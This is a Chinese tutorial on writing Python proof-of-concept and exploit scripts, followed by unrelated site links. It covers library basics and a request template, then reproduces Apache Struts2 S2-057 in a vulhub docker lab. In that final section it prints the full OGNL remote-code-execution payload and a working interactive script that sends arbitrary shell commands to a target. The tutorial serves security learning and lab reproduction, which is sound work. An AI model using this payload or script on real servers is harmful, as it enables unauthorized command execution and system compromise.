从入门到实战编写Python Poc利用!

简介: 从入门到实战编写Python Poc利用!

ee1cab62809aa3a7e74f05d8f49b7ce3_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png


01 什么是POC

PoC(全称: Proof of Concept), 中文译作概念验证。在安全界,你可以理解成为漏洞验证程序。和一些应用程序相比,PoC 是一段不完整的程序,仅仅是为了证明提出者的观点的一段代码。


02什么是EXP


Exp(全称: Exploit),中文叫**漏洞利用程序,**就是一段可以发挥漏洞价值的程序。想象一下这样的场景,目标存在一个 SQL 注入漏洞,然后被你知道了,然后你编写了一个程序,通过这个 SQL 注入漏洞,拿到了目标的权限,那么这个程序就是所谓的 Exp 了,当然,如果你没有使用这个漏洞,它就这么放着,那么这个漏洞,对你来说可以认为是没有价值的。


03关于 PoC/Exp 的两个误区


1.写 PoC 要会 Python?PoC 的存在,只有一个目的:证明漏洞存在。而关于 PoC 的形式,或者说代码实现方式,你喜欢用什么语言,就用什么语言。推荐Python语言书写,因为Python书写简单,易读懂。

2. PoC就是 Exp?其实严格来讲,PoC 和 Exp 是两个东西。PoC 就是用来证明漏洞存在的,而 Exp 是用来利用这个漏洞进一步进行攻击,在很多情况下,知道了漏洞存在,却不知道具体怎么利用,编写一个 PoC 非常简单,而编写一个 Exp 是有一定难度的。

举个栗子:

Poc好比你家门锁存在问题,别人知道,但不搞破坏;而Exp就是知道你家门锁有问题,通过进一步利用,进你家进行盗窃等违法行为。


04PoC 编写流程


对于一个已知公开的漏洞,编写流程大致分为以下几个步骤:

  1. 查看漏洞详情,确定影响范围。获取一个漏洞的详细情况后,可以通过官网下载受影响版本,或者在github上查找已有的docker文件。
  2. 搭建漏洞环境 通过虚拟机、docker、phpstudy搭建漏洞环境,有条件的同学可以在云端搭建,(这里推荐使用docker进行搭建,搭建环境中会出现一些错误,浪费不必要的时间,而已有的docker是大佬们对漏洞进行复现后写出来的docker文件)。
  3. 复现漏洞 根据漏洞详情,跟着走一遍流程,检测漏洞是否存在,其中要尤其注意些参数、命令、函数及对应的提交方法,大概了解漏洞的原理、利用过程、判断漏洞是否存在的地方。
  4. 书写Poc 在漏洞复现完成后,开始着手写Poc,以可以先写一个简单的请求,检查漏洞是否存在,然后可以将页面的请求通过正则或者lxml进行过滤得到想要的结果。
  5. 测试Poc 通过搭建的环境对书写的Poc进行测试,在书写的时候验证漏洞存在后,每次进行修改都要进行测试,最终达到想要的效果。


05Poc编写中涉及到的一些库


urllib —— 提供的一个用于操作URL的模块,爬取网页的时候,经常需要用到这个库。

urllib.request —— 打开和读取url
urllib.error —— 包含 urllib.request 抛出的异常。
urllib.parse —— 解析 URL。

requests —— 实现的简单易用的HTTP库,比urllib更加简洁

requests.get(url,headers,data,verify=False,proxies=proxy,timeout=10)
url —— 请求的url
headers —— 请求时构造的请求头
data —— 请求时带入的数据
verify —— 取消https告警
proxies —— 代理设置
timeout —— 请求响应超时处理

re —— 正则表达式模块,使用简洁的字符表达式,匹配字符串中想要的结果

使用的正则语法,建议将请求源码复制到在线正则匹配网站,进行正则语法构造。

正则在线测试:https://c.runoob.com/front-end/854

json —— 将Python数据处理成json格式或者将json数据处理成Python数据格式

两种方法
json.dumps  将 Python 对象编码成 JSON 字符串 
json.loads   将已编码的 JSON 字符串解码为 Python 对象

lxml —— XML和HTML的解析器,其主要功能是解析和提取XML和HTML中的数据,也可以定位特定元素及节点的信息

lxml 定位元素节点涉及到Xpath语法
from lxml import etree
html = etree.HTML(response.text)
result = html.xpath('xpath语句')
print(result)

optparse —— 命令行参数模块,在Poc中经常看到一些参数 -h(--hlep)、-u(--url)等参数,就是使用的此模块

parser = optparse.OptionParser()   # 导入OptionParser对象后才可以使用add_option
parse.add_option('-u','--user',dest='user',action='store',type=str,metavar='user',help='Enter User Name!!')    # 添加需要的参数和内容
parse.set_defaults(v=1.2)  #也可以这样设置默认值  
options,args=parse.parse_args()

base64 —— 对字符串进行base64加密解密模块

base64.b64encode() —— 编码函数
base64.b64decode() —— 解码函数

multiprocessing —— 多进程,在处理一些数据量较大的请求时可以使用多进程来较少处理时间。(Pyhton的多线程是假的并不是并发而是串发的)

from multiprocessing import Process
def Poc():
xxxx
....
if __name == '__main__':
    for i in rangge(5):
        thread = Process(target=Poc,args=str(i))
        thread.start()
    Thread.join()


06Web漏洞Poc编写基本方法


import requests
import re
from requests.packages.urllib3.exceptions import InsecureRequestWarning
def Poc(url):
target_url = url + 'payload' #验证存在漏洞的url
# 代理池设置
proxy = {
        'http':'127.0.0.1:812',
        'http':'127.0.0.1:8123'
    }
# 请求头部分构造
    headers = {
        'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36',   #模拟浏览器请求
        'cookie':'xxxxxxxxxxxxxx',   #有些请求需要带上cookie才可以请求到想要的内容
        'Connection':'close'   #关闭多余的连接请求
    }
    data = {'name':'xxxx','value':'xxxx'}   #向url中带入请求的数据
    # 使用try except对异常进行处理
    try:
        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)    #取消SSL验证告警
        response = requests.get(url=target_url,headers=headers,data=data,verify=False,proxies=proxy,timeout=10)   #请求漏洞的url
        if response.status_code == 200:
            result = re.search(r'_____',response.text,re.I)    #使用正则匹配页面请求,下划线处填写正则规则
            print('正在获取结果:{}'.format(result.group(1)))
        else:
            print('请求失败:{}'.format(response.status_code))
    except Exception as e:
        print('请求失败: {}'.format(e))
if __name__ == '__main__':
    url = str(input('请输入检测的url:'))
    Poc(url)


07实战漏洞Poc编写


这里使用Struts2 s2-057漏洞进行测试 漏洞部署使用docker,源码下载连接:https://github.com/vulhub/vulhub/tree/master/struts2/s2-057 启动环境:docker-compose up -d

访问:http://192.168.11.124:8080/struts2-showcase/

d97fda3f694530bdafeea1d2b26ef91a_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

首先复现漏洞,了解漏洞复现每一步。进行poc编写测试:验证漏洞是否存在 :

Poc:/struts2-showcase/$%7B233*233%7D/actionChain1.action

http://192.168.11.124:8080/struts2-showcase/$%7B233*233%7D/actionChain1.action

访问连接后,连接中的$%7B233*233%7D 被解析成了 54289(233*233),说明存在漏洞。

52be10ed11c51e5ec0fcfce0afd46804_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

随后可以根据已有的漏洞Poc(exp),再次进行验证。

注:此处的poc需要进行url编码。

Poc(exp):${(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#ct=#request['struts.valueStack'].context).(#cr=#ct['com.opensymphony.xwork2.ActionContext.container']).(#ou=#cr.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ou.getExcludedPackageNames().clear()).(#ou.getExcludedClasses().clear()).(#ct.setMemberAccess(#dm)).(#a=@java.lang.Runtime@getRuntime().exec('id')).(@org.apache.commons.io.IOUtils@toString(#a.getInputStream()))}

8f0b320aa646fdd427821fdd52707a0e_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

漏洞复现基本完成,现在进行Poc编写。

import requests 
import sys 
def title():
    print('+------------------------------------------')
    print('Version:Struts S2-057                     ')
    print('author:Tackrio                            ')
    print('use:exploit.py url                        ')
    print('+------------------------------------------')
def Poc(url):
    try:
        while True:
            cmd = input('$')
            payload_command = '/struts2/%24%7B(%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS).(%23ct%3D%23request%5B%27struts.valueStack%27%5D.context).(%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D).(%23ou%3D%23cr.getInstance(%40com.opensymphony.xwork2.ognl.OgnlUtil%40class)).(%23ou.getExcludedPackageNames().clear()).(%23ou.getExcludedClasses().clear()).(%23ct.setMemberAccess(%23dm)).(%23a%3D%40java.lang.Runtime%40getRuntime().exec(%27'+cmd+'%27)).(%40org.apache.commons.io.IOUtils%40toString(%23a.getInputStream()))%7D/actionChain1.action' 
            payload_test = '/struts2-showcase/$%7B1+1%7D/actionChain1.action'
            response_test = requests.get(url=url + payload_test,allow_redirects=False,verify=False,timeout=6)
            content = response_test.headers.get('Location').split('/')[2]
            if cmd == 'exit':
                exit()
            if response_test.status_code == 302 and content == '2':
                url1 = url + payload_command
                response = requests.get(url=url1,allow_redirects=False,verify=False,timeout=6)
                print(response.headers.get('Location').split('/')[2])
    except requests.ConnectionError as error:
        print("请求出错:",error)
if __name__ == "__main__":
    title()
    args = sys.argv[1]
    Poc(url=args)

40ac402f81085050956a410b462d904f_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png


相关文章
|
1天前
|
缓存 算法 数据处理
Python入门:9.递归函数和高阶函数
在 Python 编程中,函数是核心组成部分之一。递归函数和高阶函数是 Python 中两个非常重要的特性。递归函数帮助我们以更直观的方式处理重复性问题,而高阶函数通过函数作为参数或返回值,为代码增添了极大的灵活性和优雅性。无论是实现复杂的算法还是处理数据流,这些工具都在开发者的工具箱中扮演着重要角色。本文将从概念入手,逐步带你掌握递归函数、匿名函数(lambda)以及高阶函数的核心要领和应用技巧。
Python入门:9.递归函数和高阶函数
|
1天前
|
开发者 Python
Python入门:8.Python中的函数
### 引言 在编写程序时,函数是一种强大的工具。它们可以将代码逻辑模块化,减少重复代码的编写,并提高程序的可读性和可维护性。无论是初学者还是资深开发者,深入理解函数的使用和设计都是编写高质量代码的基础。本文将从基础概念开始,逐步讲解 Python 中的函数及其高级特性。
Python入门:8.Python中的函数
|
1天前
|
存储 SQL 索引
Python入门:7.Pythond的内置容器
Python 提供了强大的内置容器(container)类型,用于存储和操作数据。容器是 Python 数据结构的核心部分,理解它们对于写出高效、可读的代码至关重要。在这篇博客中,我们将详细介绍 Python 的五种主要内置容器:字符串(str)、列表(list)、元组(tuple)、字典(dict)和集合(set)。
Python入门:7.Pythond的内置容器
|
1天前
|
存储 索引 Python
Python入门:6.深入解析Python中的序列
在 Python 中,**序列**是一种有序的数据结构,广泛应用于数据存储、操作和处理。序列的一个显著特点是支持通过**索引**访问数据。常见的序列类型包括字符串(`str`)、列表(`list`)和元组(`tuple`)。这些序列各有特点,既可以存储简单的字符,也可以存储复杂的对象。 为了帮助初学者掌握 Python 中的序列操作,本文将围绕**字符串**、**列表**和**元组**这三种序列类型,详细介绍其定义、常用方法和具体示例。
Python入门:6.深入解析Python中的序列
|
1天前
|
知识图谱 Python
Python入门:4.Python中的运算符
Python是一间强大而且便捷的编程语言,支持多种类型的运算符。在Python中,运算符被分为算术运算符、赋值运算符、复合赋值运算符、比较运算符和逻辑运算符等。本文将从基础到进阶进行分析,并通过一个综合案例展示其实际应用。
|
1天前
|
程序员 UED Python
Python入门:3.Python的输入和输出格式化
在 Python 编程中,输入与输出是程序与用户交互的核心部分。而输出格式化更是对程序表达能力的极大增强,可以让结果以清晰、美观且易读的方式呈现给用户。本文将深入探讨 Python 的输入与输出操作,特别是如何使用格式化方法来提升代码质量和可读性。
Python入门:3.Python的输入和输出格式化
|
1天前
|
存储 Linux iOS开发
Python入门:2.注释与变量的全面解析
在学习Python编程的过程中,注释和变量是必须掌握的两个基础概念。注释帮助我们理解代码的意图,而变量则是用于存储和操作数据的核心工具。熟练掌握这两者,不仅能提高代码的可读性和维护性,还能为后续学习复杂编程概念打下坚实的基础。
Python入门:2.注释与变量的全面解析
|
Python
PYTHON实战两数之和
1. 两数之和 难度:简单 收藏 给定一个整数数组 nums 和一个整数目标值 target,请你在该数组中找出 和为目标值 target 的那 两个 整数,并返回它们的数组下标。 你可以假设每种输入只会对应一个答案。但是,数组中同一个元素在答案里不能重复出现。 你可以按任意顺序返回答案。
207 0
PYTHON实战两数之和
|
23天前
|
存储 缓存 Java
Python高性能编程:五种核心优化技术的原理与Python代码
Python在高性能应用场景中常因执行速度不及C、C++等编译型语言而受质疑,但通过合理利用标准库的优化特性,如`__slots__`机制、列表推导式、`@lru_cache`装饰器和生成器等,可以显著提升代码效率。本文详细介绍了这些实用的性能优化技术,帮助开发者在不牺牲代码质量的前提下提高程序性能。实验数据表明,这些优化方法能在内存使用和计算效率方面带来显著改进,适用于大规模数据处理、递归计算等场景。
58 5
Python高性能编程:五种核心优化技术的原理与Python代码
|
2月前
|
Python
[oeasy]python055_python编程_容易出现的问题_函数名的重新赋值_print_int
本文介绍了Python编程中容易出现的问题,特别是函数名、类名和模块名的重新赋值。通过具体示例展示了将内建函数(如`print`、`int`、`max`)或模块名(如`os`)重新赋值为其他类型后,会导致原有功能失效。例如,将`print`赋值为整数后,无法再用其输出内容;将`int`赋值为整数后,无法再进行类型转换。重新赋值后,这些名称失去了原有的功能,可能导致程序错误。总结指出,已有的函数名、类名和模块名不适合覆盖赋新值,否则会失去原有功能。如果需要使用类似的变量名,建议采用其他命名方式以避免冲突。
52 14

热门文章

最新文章

推荐镜像

更多